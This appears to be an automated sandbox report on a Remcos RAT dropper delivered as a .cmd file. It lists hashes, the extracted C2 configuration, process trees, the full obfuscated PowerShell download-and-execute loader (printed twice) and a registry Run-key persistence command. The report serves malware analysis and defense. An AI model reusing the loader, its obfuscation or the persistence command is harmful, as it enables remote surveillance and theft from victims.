Overview

overview

10

Static

static

1

IMG4652442...er.cmd

windows7-x64

10

IMG4652442...er.cmd

windows10-2004-x64

10

Analysis

  • max time kernel
    299s
  • max time network
    301s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    21/10/2024, 16:18

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    IMG465244247443 CAIRO OFFER Opmagasiner.cmd

  • Size

    5KB

  • MD5

    d4a5745ec008932bec834b981d31bd8f

  • SHA1

    c57e44498a52b6aa60e55c19a16cb026104fa19c

  • SHA256

    40b46bae5cca53c55f7b7f941b0a02aeb5ef5150d9eff7258c48f92de5435216

  • SHA512

    7de89b88dbba6d2310ef79bad8bc6c82ec12b0e8c0abfc0229f3ca4765606c1c2f342cd996d63882e7e0aab4fd1f3d15d016108831e286d7e3aa26e09aef454f

  • SSDEEP

    96:zX+gBYcM44kNPsQa/+2bBRpgccIgEyHa9a6ONt/3nU56D+9EFA/W8v8OS7x+LSKv:T+gKc2k6Qa/cJJNd3n3wR+B1Kv

Score
10/10
remcosmiss chydiscoveryexecutionpersistencerat

Malware Config

Extracted

Family

remcos

Botnet

MISS Chy

C2

pelele.duckdns.org:51525

Attributes
  • audio_folder

    MicRecords

  • audio_record_time

    5

  • connect_delay

    0

  • connect_interval

    1

  • copy_file

    remcos.exe

  • copy_folder

    Remcos

  • delete_file

    false

  • hide_file

    false

  • hide_keylog_file

    false

  • install_flag

    false

  • keylog_crypt

    false

  • keylog_file

    logs.dat

  • keylog_flag

    false

  • keylog_folder

    remcos

  • mouse_option

    false

  • mutex

    Rmc-TXCR8B

  • screenshot_crypt

    false

  • screenshot_flag

    false

  • screenshot_folder

    Screenshots

  • screenshot_path

    %AppData%

  • screenshot_time

    10

  • take_screenshot_option

    false

  • take_screenshot_time

    5

Signatures

  • Remcos

    Remcos is a closed-source remote control and surveillance software.

    ratremcos
  • Blocklisted process makes network request 64 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell and hide display window.

    execution
  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 4 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Modifies registry key 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\IMG465244247443 CAIRO OFFER Opmagasiner.cmd"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1084
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -windowstyle hidden " <#Skedekatarer Negligent Azoparaffin Cardinalfishes Germens Asbestinize Mell #>;$Vorticularly='Conversed';<#Unabdicated amagermadens Hovedkortene arbejdsvrelsers Indehavde Storgaard #>;$Forlbsmodellen=$Paedeutics+$host.UI; function Abkhasian($amphivorous){If ($Forlbsmodellen) {$knipsendes++;}$Scythework=$Flyingly+$amphivorous.'Length'-$knipsendes; for( $Idiocyclophanous=4;$Idiocyclophanous -lt $Scythework;$Idiocyclophanous+=5){$Geometrierne=$Idiocyclophanous;$Faujdar+=$amphivorous[$Idiocyclophanous];$Unstooped='Tinnets';}$Faujdar;}function Yderzoner($modernes){ . ($Syvtallene) ($modernes);}$Stenbroer=Abkhasian ' ,enMAflboUn,uzStreiRecelProtlMotoaF na/Over ';$Stenbroer+=Abkhasian 'glds5 Ins. mud0 ,io e v(LeukWOdaxiA frnSoffd FdsoOpnawKruksConv py mNDunsTSt e p yt1Befo0 Fug.Driv0gy e; Ret E uaWVer iSocinForu6 Fla4Pr,b;Rein m lix Pe 6Cosi4 Hem;Syn, PterrJakovDuks:Sv n1V di3Mine1Oppu.Ambu0mi.u)Quin Un iGKar eGif,cEnsikSlaso Cua/ .ut2stad0Rute1Semi0 San0 For1Rum.0U se1Tids ForsF.natiTar r eieVaccfExcoo.hanxTaff/ iel1Unsk3Haan1Duel.fre 0Baro ';$Genbrugelig=Abkhasian 'CompUTelts holE jleR lge-CormAE osGOverEBi dNSemitProp ';$Bruttonationalprodukternes=Abkhasian ' arch Udbt Aa,tGallp Fels,ver: Hek/Haar/IrakpO oilgrc,i isne I tl Errtfor,d Ins.GipstSpawo W rpIcos/ pluUPneunSothdAntheDommr DokbFa gyresag ,kogBlokeRecolNonhsK lkeBa,p. .hoaGalgaExotfQuin ';$Margueritha=Abkhasian ' epi> Nes ';$Syvtallene=Abkhasian 'AftaiFab E aalxMo i ';$trappens='Lobale207';$Idiocyclophanousnhalerende='\Rafting.Ans';Yderzoner (Abkhasian 'Proc$Si iGMotoLMaanoT.leBFritaDikaLRem,:RhyseCadgMinteB SlyU ,roSDiacq StuUgrunE rte=De e$DendESammNSjlevKnot:KastaKa,tPAbsipFlandLgdoaud aTAffaALbin+Chur$HemaiMongDtramiPegaoTradcEnsnYDownCKn,gLForeOFdevPT.onhOli,a esenFallo Indu EchsEs rNFugthKattaUdfoLBiblESpekrVelmeThyrNHarmDFdevE Und ');Yderzoner (Abkhasian 'Madk$Hal.gNe.ll AccOK aibC.staFjerlunsu:AndisPhilT T nu SugdTillE OpfNinciTIntreBletRKonsB ccRRegidUddeeMedlTLary=Glat$Acupba.barSortuO,klT KyntclubOScabnPh nAB bbTPhyti GodoAn.inBepaA olLFluoPDimar errOForbD Hypu U pKS mpt noneKongR,aasnDaa eFodbs.eng.TempS nfpSmoolV luiUranTTh.r( ,eg$ CayMSec aContrEmanGAutou PluECivirCriniDe eTryotHAdhsACam.) Fld ');Yderzoner (Abkhasian 'Unca[Mit.n,ilseQuinTDat .GymnsDuale ZemrMe,nvLibiiEighCVoluE FuspAlleOBordI andNBurrT,anzMEdicAArsen SpoASnorG ,rneTabsrG li] pre:like: S eS .ntECantcmisiUKon RJerni da tKibbYHaruP anaROrdroKa iTPermoJo rCunpoOBotrLUnde Raun=Drag Afbe[protNKonte RenTReto.d hysBrsteGrssC RelUEgnsR InfiJaphT triyAlkoPS orrH jsoBefiT rchoHarmc iboUndel.ymbt cirySafepB rbeFi t]Snuf: Pr.: KamtMagnlhierSVice1Angl2 Vic ');$Bruttonationalprodukternes=$Studenterbrdet[0];$exhaust=(Abkhasian 'phil$OmsoGTegnLKberOMiniB Kr.A,artlPost:smaapInjeAEn oR t,rECeliNDifftPayeHBalloWorrOrigid seu=UnafNFuldE ,erw Kla-De aOF.rwbTyraJOvereTulrcBounT lst RinSReflYTjenSKhouTP imEProfm Mi .Kab NIndlEbag t.ree.MorgwRealEA erbThencNbenL eomI pereAsteNSolbTSta ');Yderzoner ($exhaust);Yderzoner (Abkhasian 'Twil$ T aPWig aStrarHeteeGenenMlketT veh weeoBirkoskradS,lf. S rHUpbre araOmkrdUdfoeInter eesOutk[Hot $Em eG BreeContn,ossbS.gnrSpirusl dgIllieCratlTilbiSynagonom] D s=Frys$BaggSBiogt aaneo ernTusib S.mr traoIn ie Fo,rAna, ');$Ufejlbarlighed=Abkhasian ' P c$ adePUnguaGlorrKoloeChopnIndotGerahG nno esvoViv,dsyss.GadfD pr oTilbwLi,unhon,lCosto.lmuaH pod KvaFAenditradl.cceeInt ( T.v$Pan,BJomfrMar uCanctMut th.smoRefen ,auaTr ctE,teiOve,o TrinFucha orslCounpTerrra deoInned Jasu TrskBlgmtDyreeUsigr.ingnCicaeFdevsUnyt,Tilr$harpmRen.oR ddd AeoeBesir L,vmV,garThulk ytefeberNonssPseu)Gauf ';$modermrkers=$embusque;Yderzoner (Abkhasian ',nfr$.blaG SkoLFrsto V,kBCapmamiljlAppr: Fo CTy eI onacForsh Mata,ljlr Bel1Seng3Ber 9Palc=Unde( smitVinkEGunpS T fT,ese-MossPblyaabasitGrodHEpin Knur$ P.jMIndbOAfgrDSur EStjeRKodemForkRCamekSam ePersr oursNait)Cuad ');while (!$Cichar139) {Yderzoner (Abkhasian 'Coll$Se,sgNat.lBudgoEnogbStenaA ullNonm:neohC Repo RevrSte.vJambe E dn ers=K,mu$ HaatI.klr ampu.ulteSisi ') ;Yderzoner $Ufejlbarlighed;Yderzoner (Abkhasian ' ,oys epTta gaDmonrHelsTNump-Bn ksFjerLFri ENoncEJuleP Dia Hjbe4 ,an ');Yderzoner (Abkhasian 'E is$Be ag EneLSemiOLil,b Gr,ATilfl lev:Tra,c AggIUdskcPhe.HDemea CorRReco1 Mdd3 Cya9 Bes=Skru(RegiTFejleQuinsTa gT ,ap-DvrgpInapaA fiTBel HA,kv B oe$IchtMDefaOExo dUntheCow,R forMNontrS roKfsteewagerCombsBusk) St ') ;Yderzoner (Abkhasian 'Fing$ScinGOverl E,yo UraBCrepASynalExte:Dagbc verlAddeA .rosUmbisRuthfFrimeSt,pl ImmLT onO CoxWAgit=R.ru$S emGAnnul Deso .chbc,naaLocoL ,ou:Coext isiITranl pans digk DrudNondEMamaT Spe+Disp+Ere.% Spn$Brans ranT.lynu Le D EmbEEmbanHobet luse FrorSog BForrR.efadstudEKiddtSt r.glosCIantoSt iuSum,NIndrtSuk, ') ;$Bruttonationalprodukternes=$Studenterbrdet[$Classfellow];}$Stes=297654;$Overconsumption105=29597;Yderzoner (Abkhasian 'Rum,$tempgHttel iffO HypbDimiAAntiLNov.: eodP rusrQuanoKunoS Z,fEudgyc atTBrileLivsdKan, Te.t=Audi Fly gInsoEDagltMono-Exp.CTalio Tagn,ntitgnieEVrinNFeritOutg Syst$narkMHandO tykDP oceS,avRFlommEd.fRIodoKSt,nE BusRVareSSels ');Yderzoner (Abkhasian ' Kur$flyvg AmalBejeoSintbPla aKommlStra:Oms.V r tePorcl LetuDonexFore El,t= cal Te s[.lueSVidey nasHelot,sore odemArmo. ComCFng oCh fn.igtv oneo errAnt.tChri]Depo:Affl: SlaFOverrSupeoo,temProdB ixiaXylosSmelePjan6Misa4oxygS ErotHjderCeleiUdtrnTrung Fis(Dema$C sePLu,pr.ndeo PibsWinde,uslcH,lhtArrie m rdfabl)Spag ');Yderzoner (Abkhasian 'Rove$OrkeGHi slGento Strb FadANonelHerc:PentBBag.i BeeoAntif KonO ,ndGUrop Mid =T ls Rus[SkalsSymbYAwessU.deToryzeLuftMRe,i. SartHarleUndeXFraft Fas. Bu Eala,nEm iCN neO AfpdBortITubenDa nGSelv]Brne: Kul:Fejla O kSbefacPreoIDesmiBoks.AmorG.ekse Q aT BessA.sttIsocRHi rISpr NprecGE,ne(Anve$ indvK,lleCircL S.ruUpwiXabso)Isla ');Yderzoner (Abkhasian ' De $BarnGGodklRepuOPartbBybiaUndel Uar: CelsOmdbm FodMCongELi sNS.ndeBiki=Femd$AlbiB UfoI ooeo ndif Re o ,fggDelu.ZoomsB,tjuPatebTurfShemiTSid RSticirestnSantgDdeb( Ya,$NoncS C,rt AneeGesnsA,li,Apos$ B,sOMaskvstepePyroRS ric.rkpOOvernPaupS EthuFiskm Inhp P aT acrIFelloNominPaat1La.o0Ult.5Adul) Pro ');Yderzoner $Smmene;"
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:4056
  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Skedekatarer Negligent Azoparaffin Cardinalfishes Germens Asbestinize Mell #>;$Vorticularly='Conversed';<#Unabdicated amagermadens Hovedkortene arbejdsvrelsers Indehavde Storgaard #>;$Forlbsmodellen=$Paedeutics+$host.UI; function Abkhasian($amphivorous){If ($Forlbsmodellen) {$knipsendes++;}$Scythework=$Flyingly+$amphivorous.'Length'-$knipsendes; for( $Idiocyclophanous=4;$Idiocyclophanous -lt $Scythework;$Idiocyclophanous+=5){$Geometrierne=$Idiocyclophanous;$Faujdar+=$amphivorous[$Idiocyclophanous];$Unstooped='Tinnets';}$Faujdar;}function Yderzoner($modernes){ . ($Syvtallene) ($modernes);}$Stenbroer=Abkhasian ' ,enMAflboUn,uzStreiRecelProtlMotoaF na/Over ';$Stenbroer+=Abkhasian 'glds5 Ins. mud0 ,io e v(LeukWOdaxiA frnSoffd FdsoOpnawKruksConv py mNDunsTSt e p yt1Befo0 Fug.Driv0gy e; Ret E uaWVer iSocinForu6 Fla4Pr,b;Rein m lix Pe 6Cosi4 Hem;Syn, PterrJakovDuks:Sv n1V di3Mine1Oppu.Ambu0mi.u)Quin Un iGKar eGif,cEnsikSlaso Cua/ .ut2stad0Rute1Semi0 San0 For1Rum.0U se1Tids ForsF.natiTar r eieVaccfExcoo.hanxTaff/ iel1Unsk3Haan1Duel.fre 0Baro ';$Genbrugelig=Abkhasian 'CompUTelts holE jleR lge-CormAE osGOverEBi dNSemitProp ';$Bruttonationalprodukternes=Abkhasian ' arch Udbt Aa,tGallp Fels,ver: Hek/Haar/IrakpO oilgrc,i isne I tl Errtfor,d Ins.GipstSpawo W rpIcos/ pluUPneunSothdAntheDommr DokbFa gyresag ,kogBlokeRecolNonhsK lkeBa,p. .hoaGalgaExotfQuin ';$Margueritha=Abkhasian ' epi> Nes ';$Syvtallene=Abkhasian 'AftaiFab E aalxMo i ';$trappens='Lobale207';$Idiocyclophanousnhalerende='\Rafting.Ans';Yderzoner (Abkhasian 'Proc$Si iGMotoLMaanoT.leBFritaDikaLRem,:RhyseCadgMinteB SlyU ,roSDiacq StuUgrunE rte=De e$DendESammNSjlevKnot:KastaKa,tPAbsipFlandLgdoaud aTAffaALbin+Chur$HemaiMongDtramiPegaoTradcEnsnYDownCKn,gLForeOFdevPT.onhOli,a esenFallo Indu EchsEs rNFugthKattaUdfoLBiblESpekrVelmeThyrNHarmDFdevE Und ');Yderzoner (Abkhasian 'Madk$Hal.gNe.ll AccOK aibC.staFjerlunsu:AndisPhilT T nu SugdTillE OpfNinciTIntreBletRKonsB ccRRegidUddeeMedlTLary=Glat$Acupba.barSortuO,klT KyntclubOScabnPh nAB bbTPhyti GodoAn.inBepaA olLFluoPDimar errOForbD Hypu U pKS mpt noneKongR,aasnDaa eFodbs.eng.TempS nfpSmoolV luiUranTTh.r( ,eg$ CayMSec aContrEmanGAutou PluECivirCriniDe eTryotHAdhsACam.) Fld ');Yderzoner (Abkhasian 'Unca[Mit.n,ilseQuinTDat .GymnsDuale ZemrMe,nvLibiiEighCVoluE FuspAlleOBordI andNBurrT,anzMEdicAArsen SpoASnorG ,rneTabsrG li] pre:like: S eS .ntECantcmisiUKon RJerni da tKibbYHaruP anaROrdroKa iTPermoJo rCunpoOBotrLUnde Raun=Drag Afbe[protNKonte RenTReto.d hysBrsteGrssC RelUEgnsR InfiJaphT triyAlkoPS orrH jsoBefiT rchoHarmc iboUndel.ymbt cirySafepB rbeFi t]Snuf: Pr.: KamtMagnlhierSVice1Angl2 Vic ');$Bruttonationalprodukternes=$Studenterbrdet[0];$exhaust=(Abkhasian 'phil$OmsoGTegnLKberOMiniB Kr.A,artlPost:smaapInjeAEn oR t,rECeliNDifftPayeHBalloWorrOrigid seu=UnafNFuldE ,erw Kla-De aOF.rwbTyraJOvereTulrcBounT lst RinSReflYTjenSKhouTP imEProfm Mi .Kab NIndlEbag t.ree.MorgwRealEA erbThencNbenL eomI pereAsteNSolbTSta ');Yderzoner ($exhaust);Yderzoner (Abkhasian 'Twil$ T aPWig aStrarHeteeGenenMlketT veh weeoBirkoskradS,lf. S rHUpbre araOmkrdUdfoeInter eesOutk[Hot $Em eG BreeContn,ossbS.gnrSpirusl dgIllieCratlTilbiSynagonom] D s=Frys$BaggSBiogt aaneo ernTusib S.mr traoIn ie Fo,rAna, ');$Ufejlbarlighed=Abkhasian ' P c$ adePUnguaGlorrKoloeChopnIndotGerahG nno esvoViv,dsyss.GadfD pr oTilbwLi,unhon,lCosto.lmuaH pod KvaFAenditradl.cceeInt ( T.v$Pan,BJomfrMar uCanctMut th.smoRefen ,auaTr ctE,teiOve,o TrinFucha orslCounpTerrra deoInned Jasu TrskBlgmtDyreeUsigr.ingnCicaeFdevsUnyt,Tilr$harpmRen.oR ddd AeoeBesir L,vmV,garThulk ytefeberNonssPseu)Gauf ';$modermrkers=$embusque;Yderzoner (Abkhasian ',nfr$.blaG SkoLFrsto V,kBCapmamiljlAppr: Fo CTy eI onacForsh Mata,ljlr Bel1Seng3Ber 9Palc=Unde( smitVinkEGunpS T fT,ese-MossPblyaabasitGrodHEpin Knur$ P.jMIndbOAfgrDSur EStjeRKodemForkRCamekSam ePersr oursNait)Cuad ');while (!$Cichar139) {Yderzoner (Abkhasian 'Coll$Se,sgNat.lBudgoEnogbStenaA ullNonm:neohC Repo RevrSte.vJambe E dn ers=K,mu$ HaatI.klr ampu.ulteSisi ') ;Yderzoner $Ufejlbarlighed;Yderzoner (Abkhasian ' ,oys epTta gaDmonrHelsTNump-Bn ksFjerLFri ENoncEJuleP Dia Hjbe4 ,an ');Yderzoner (Abkhasian 'E is$Be ag EneLSemiOLil,b Gr,ATilfl lev:Tra,c AggIUdskcPhe.HDemea CorRReco1 Mdd3 Cya9 Bes=Skru(RegiTFejleQuinsTa gT ,ap-DvrgpInapaA fiTBel HA,kv B oe$IchtMDefaOExo dUntheCow,R forMNontrS roKfsteewagerCombsBusk) St ') ;Yderzoner (Abkhasian 'Fing$ScinGOverl E,yo UraBCrepASynalExte:Dagbc verlAddeA .rosUmbisRuthfFrimeSt,pl ImmLT onO CoxWAgit=R.ru$S emGAnnul Deso .chbc,naaLocoL ,ou:Coext isiITranl pans digk DrudNondEMamaT Spe+Disp+Ere.% Spn$Brans ranT.lynu Le D EmbEEmbanHobet luse FrorSog BForrR.efadstudEKiddtSt r.glosCIantoSt iuSum,NIndrtSuk, ') ;$Bruttonationalprodukternes=$Studenterbrdet[$Classfellow];}$Stes=297654;$Overconsumption105=29597;Yderzoner (Abkhasian 'Rum,$tempgHttel iffO HypbDimiAAntiLNov.: eodP rusrQuanoKunoS Z,fEudgyc atTBrileLivsdKan, Te.t=Audi Fly gInsoEDagltMono-Exp.CTalio Tagn,ntitgnieEVrinNFeritOutg Syst$narkMHandO tykDP oceS,avRFlommEd.fRIodoKSt,nE BusRVareSSels ');Yderzoner (Abkhasian ' Kur$flyvg AmalBejeoSintbPla aKommlStra:Oms.V r tePorcl LetuDonexFore El,t= cal Te s[.lueSVidey nasHelot,sore odemArmo. ComCFng oCh fn.igtv oneo errAnt.tChri]Depo:Affl: SlaFOverrSupeoo,temProdB ixiaXylosSmelePjan6Misa4oxygS ErotHjderCeleiUdtrnTrung Fis(Dema$C sePLu,pr.ndeo PibsWinde,uslcH,lhtArrie m rdfabl)Spag ');Yderzoner (Abkhasian 'Rove$OrkeGHi slGento Strb FadANonelHerc:PentBBag.i BeeoAntif KonO ,ndGUrop Mid =T ls Rus[SkalsSymbYAwessU.deToryzeLuftMRe,i. SartHarleUndeXFraft Fas. Bu Eala,nEm iCN neO AfpdBortITubenDa nGSelv]Brne: Kul:Fejla O kSbefacPreoIDesmiBoks.AmorG.ekse Q aT BessA.sttIsocRHi rISpr NprecGE,ne(Anve$ indvK,lleCircL S.ruUpwiXabso)Isla ');Yderzoner (Abkhasian ' De $BarnGGodklRepuOPartbBybiaUndel Uar: CelsOmdbm FodMCongELi sNS.ndeBiki=Femd$AlbiB UfoI ooeo ndif Re o ,fggDelu.ZoomsB,tjuPatebTurfShemiTSid RSticirestnSantgDdeb( Ya,$NoncS C,rt AneeGesnsA,li,Apos$ B,sOMaskvstepePyroRS ric.rkpOOvernPaupS EthuFiskm Inhp P aT acrIFelloNominPaat1La.o0Ult.5Adul) Pro ');Yderzoner $Smmene;"
    1⤵
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: MapViewOfSection
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:4400
    • C:\Windows\SysWOW64\msiexec.exe
      "C:\Windows\SysWOW64\msiexec.exe"
      2⤵
      • Blocklisted process makes network request
      • Suspicious use of NtCreateThreadExHideFromDebugger
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • System Location Discovery: System Language Discovery
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:3328
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Gummicheckene" /t REG_EXPAND_SZ /d "%Assumably% -windowstyle 1 $Dilatationens=(gp -Path 'HKCU:\Software\Darksomeness\').Subtropiske;%Assumably% ($Dilatationens)"
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:3696
        • C:\Windows\SysWOW64\reg.exe
          REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Gummicheckene" /t REG_EXPAND_SZ /d "%Assumably% -windowstyle 1 $Dilatationens=(gp -Path 'HKCU:\Software\Darksomeness\').Subtropiske;%Assumably% ($Dilatationens)"
          4⤵
          • Adds Run key to start application
          • System Location Discovery: System Language Discovery
          • Modifies registry key
          PID:2148

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\ProgramData\remcos\logs.dat
    Filesize

    144B

    MD5

    3eba0585001123a9af189bbd01db92c2

    SHA1

    8d56ab3cb44832905360d7b19a67d8ea38e51805

    SHA256

    c23d68174308ae75fbeb912957e060aed78e5c1c1c072c1e0598db7e869c2bc4

    SHA512

    de987cca63c3f673399e9d3f730697f0bb156e2483f4e8739481e57303be31d60a791eb7f37c99e3893eba0f543c53a51cc8d2cb5dd90ac320980be0b913dae3

    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize

    1KB

    MD5

    d4ff23c124ae23955d34ae2a7306099a

    SHA1

    b814e3331a09a27acfcd114d0c8fcb07957940a3

    SHA256

    1de6cfd5e02c052e3475d33793b6a150b2dd6eebbf0aa3e4c8e4e2394a240a87

    SHA512

    f447a6042714ae99571014af14bca9d87ede59af68a0fa1d880019e9f1aa41af8cbf9c08b0fea2ccb7caa48165a75825187996ea6939ee8370afa33c9f809e79

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ulzppebc.z0i.ps1
    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    Download Submit

  • C:\Users\Admin\AppData\Roaming\Rafting.Ans
    Filesize

    426KB

    MD5

    ce429a8bb4d6fe008bb30e20337dab1a

    SHA1

    aab03694aa2d8a456dd3fc03d7b1b76e6bcfbad4

    SHA256

    2757cc9a4254063d89899ea0013b5d7f12c76f8c68c776ac6b00b8c135e53746

    SHA512

    fbb466962fcbceff06daa0266c37c43d1a124ac991aea0b7dd5fe6fb0f0d93bf2dfbff48005e5f622f8a54f08e3f07b4000e898683ffcf1bc0249ec846ebb72d

    Download Submit

  • memory/3328-65-0x0000000001030000-0x0000000002284000-memory.dmp

    Filesize

    18.3MB

    Download

  • memory/4056-3-0x00000223FD850000-0x00000223FD872000-memory.dmp

    Filesize

    136KB

    Download

  • memory/4056-13-0x00007FF8E8380000-0x00007FF8E8E41000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/4056-14-0x00007FF8E8380000-0x00007FF8E8E41000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/4056-17-0x00007FF8E8380000-0x00007FF8E8E41000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/4056-20-0x00007FF8E8380000-0x00007FF8E8E41000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/4056-2-0x00007FF8E8383000-0x00007FF8E8385000-memory.dmp

    Filesize

    8KB

    Download

  • memory/4400-41-0x0000000005EF0000-0x0000000005F3C000-memory.dmp

    Filesize

    304KB

    Download

  • memory/4400-23-0x0000000075210000-0x00000000759C0000-memory.dmp

    Filesize

    7.7MB

    Download

  • memory/4400-27-0x0000000005020000-0x0000000005086000-memory.dmp

    Filesize

    408KB

    Download

  • memory/4400-28-0x0000000005790000-0x00000000057F6000-memory.dmp

    Filesize

    408KB

    Download

  • memory/4400-38-0x0000000005800000-0x0000000005B54000-memory.dmp

    Filesize

    3.3MB

    Download

  • memory/4400-24-0x00000000050F0000-0x0000000005718000-memory.dmp

    Filesize

    6.2MB

    Download

  • memory/4400-40-0x0000000005E60000-0x0000000005E7E000-memory.dmp

    Filesize

    120KB

    Download

  • memory/4400-25-0x0000000075210000-0x00000000759C0000-memory.dmp

    Filesize

    7.7MB

    Download

  • memory/4400-42-0x00000000076D0000-0x0000000007D4A000-memory.dmp

    Filesize

    6.5MB

    Download

  • memory/4400-43-0x00000000063F0000-0x000000000640A000-memory.dmp

    Filesize

    104KB

    Download

  • memory/4400-44-0x00000000070F0000-0x0000000007186000-memory.dmp

    Filesize

    600KB

    Download

  • memory/4400-45-0x0000000007080000-0x00000000070A2000-memory.dmp

    Filesize

    136KB

    Download

  • memory/4400-46-0x0000000008300000-0x00000000088A4000-memory.dmp

    Filesize

    5.6MB

    Download

  • memory/4400-26-0x0000000004F80000-0x0000000004FA2000-memory.dmp

    Filesize

    136KB

    Download

  • memory/4400-48-0x0000000075210000-0x00000000759C0000-memory.dmp

    Filesize

    7.7MB

    Download

  • memory/4400-49-0x0000000075210000-0x00000000759C0000-memory.dmp

    Filesize

    7.7MB

    Download

  • memory/4400-50-0x0000000075210000-0x00000000759C0000-memory.dmp

    Filesize

    7.7MB

    Download

  • memory/4400-51-0x0000000075210000-0x00000000759C0000-memory.dmp

    Filesize

    7.7MB

    Download

  • memory/4400-52-0x0000000075210000-0x00000000759C0000-memory.dmp

    Filesize

    7.7MB

    Download

  • memory/4400-53-0x00000000088B0000-0x000000000E1B0000-memory.dmp

    Filesize

    89.0MB

    Download

  • memory/4400-54-0x000000007521E000-0x000000007521F000-memory.dmp

    Filesize

    4KB

    Download

  • memory/4400-55-0x0000000075210000-0x00000000759C0000-memory.dmp

    Filesize

    7.7MB

    Download

  • memory/4400-56-0x0000000075210000-0x00000000759C0000-memory.dmp

    Filesize

    7.7MB

    Download

  • memory/4400-57-0x0000000075210000-0x00000000759C0000-memory.dmp

    Filesize

    7.7MB

    Download

  • memory/4400-58-0x0000000075210000-0x00000000759C0000-memory.dmp

    Filesize

    7.7MB

    Download

  • memory/4400-22-0x0000000002550000-0x0000000002586000-memory.dmp

    Filesize

    216KB

    Download

  • memory/4400-21-0x000000007521E000-0x000000007521F000-memory.dmp

    Filesize

    4KB

    Download